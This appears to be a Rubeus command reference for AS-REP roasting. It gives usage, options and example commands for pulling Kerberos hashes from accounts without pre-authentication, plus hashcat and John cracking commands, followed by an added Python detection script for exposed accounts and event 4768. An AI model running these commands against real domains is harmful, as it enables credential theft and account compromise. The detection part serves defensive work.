asreproast
AS-REP roast accounts that don't require Kerberos pre-authentication. Requests AS-REP without supplying pre-auth data, extracts the encrypted portion for offline cracking.
Usage
Rubeus.exe asreproast [/user:<username>] [/domain:<domain>] [/dc:<dc-ip>] [/ou:"OU=..."] [/ldaps] [/des] [/nowrap] [/outfile:<output>] [/format:hashcat|john] [/creduser:<domain>\<username>] [/credpassword:<password>]
Options
- /user:<username> - target specific user (default: all preauth-disabled users)
- /domain:<domain> - target domain (default: current)
- /dc:<dc-ip> - domain controller
- /ou:"OU=..." - restrict to specific OU
- /ldaps - use LDAPS (port 636) for enumeration
- /outfile:<output> - write hashes to file, one per line
- /format:hashcat - output in hashcat format (mode 18200); default is John (Jumbo)
- /des - request DES encryption (RC4 is default)
- /nowrap - don't line-wrap
- /creduser:<domain>\<username> - alternate credentials for LDAP enumeration
- /credpassword:<password> - password for alternate credentials
Examples
# Roast all users without preauth in current domain
Rubeus.exe asreproast
# Roast specific user
Rubeus.exe asreproast /user:<username>
# Output Hashcat format to file
Rubeus.exe asreproast /outfile:<output> /format:hashcat
# Target specific OU
Rubeus.exe asreproast /ou:"OU=ServiceAccounts,DC=corp,DC=local" /format:hashcat /outfile:<output>
# Cross-domain
Rubeus.exe asreproast /domain:<domain>
# With alternate credentials (non-trusting domain)
Rubeus.exe asreproast /domain:<domain> /creduser:"<domain>\<username>" /credpassword:<password>
Crack Hashes
# Hashcat (mode 18200)
hashcat -m 18200 hashes.txt wordlist.txt
# John
john --wordlist=wordlist.txt hashes.txt
Notes
- Hash format (John): $krb5asrep$<user>@<domain>:<hash>
- Hash format (Hashcat): $krb5asrep$23$<user>@<domain>:<hash>
- Identifies accounts with DONT_REQUIRE_PREAUTH flag set in userAccountControl
- No elevated privileges required
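
Defender-side view of the notes above, as an added example that is not part of the original page or of Rubeus: it audits userAccountControl values for the DONT_REQUIRE_PREAUTH bit and filters Security event 4768 records for TGTs issued without pre-authentication. The account list, event records, and function names are constructed for illustration; the event dictionaries are a simplified form of the real 4768 fields.

```python
# Added defender-side example; all account and event data below is constructed.
UF_ACCOUNTDISABLE = 0x0002           # userAccountControl bit: account disabled
UF_DONT_REQUIRE_PREAUTH = 0x400000   # userAccountControl bit: pre-auth not required

# Constructed directory export: (sAMAccountName, userAccountControl)
SAMPLE_ACCOUNTS = [
    ("alice", 0x000200),       # normal account
    ("svc_backup", 0x400200),  # normal account, pre-auth not required
    ("old_svc", 0x400202),     # pre-auth not required, but disabled
    ("bob", 0x010200),         # normal account, password never expires
]

# Constructed, simplified Security event 4768 (TGT requested) records
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.5"},
    {"EventID": 4768, "TargetUserName": "svc_backup", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.77"},
    {"EventID": 4768, "TargetUserName": "svc_backup", "PreAuthType": "0",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.20"},
    {"EventID": 4769, "TargetUserName": "bob", "TicketEncryptionType": "0x17",
     "IpAddress": "10.0.0.77"},
]


def exposed_accounts(accounts):
    """Enabled accounts that have DONT_REQUIRE_PREAUTH set."""
    return [name for name, uac in accounts
            if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE]


def no_preauth_tgt_requests(events):
    """4768 events answered without pre-auth, RC4 (0x17) replies ranked first."""
    hits = [e for e in events
            if e.get("EventID") == 4768 and e.get("PreAuthType") == "0"]
    # etype 23 (0x17, RC4-HMAC) is what the $krb5asrep$23$ / mode 18200 format carries
    return sorted(hits, key=lambda e: e.get("TicketEncryptionType") != "0x17")


if __name__ == "__main__":
    print("Exposed accounts:", exposed_accounts(SAMPLE_ACCOUNTS))
    for ev in no_preauth_tgt_requests(SAMPLE_EVENTS):
        print(ev["TargetUserName"], ev["IpAddress"], ev["TicketEncryptionType"])
```

Accounts returned by exposed_accounts are candidates for re-enabling pre-authentication or, where that is not possible, for long random passwords.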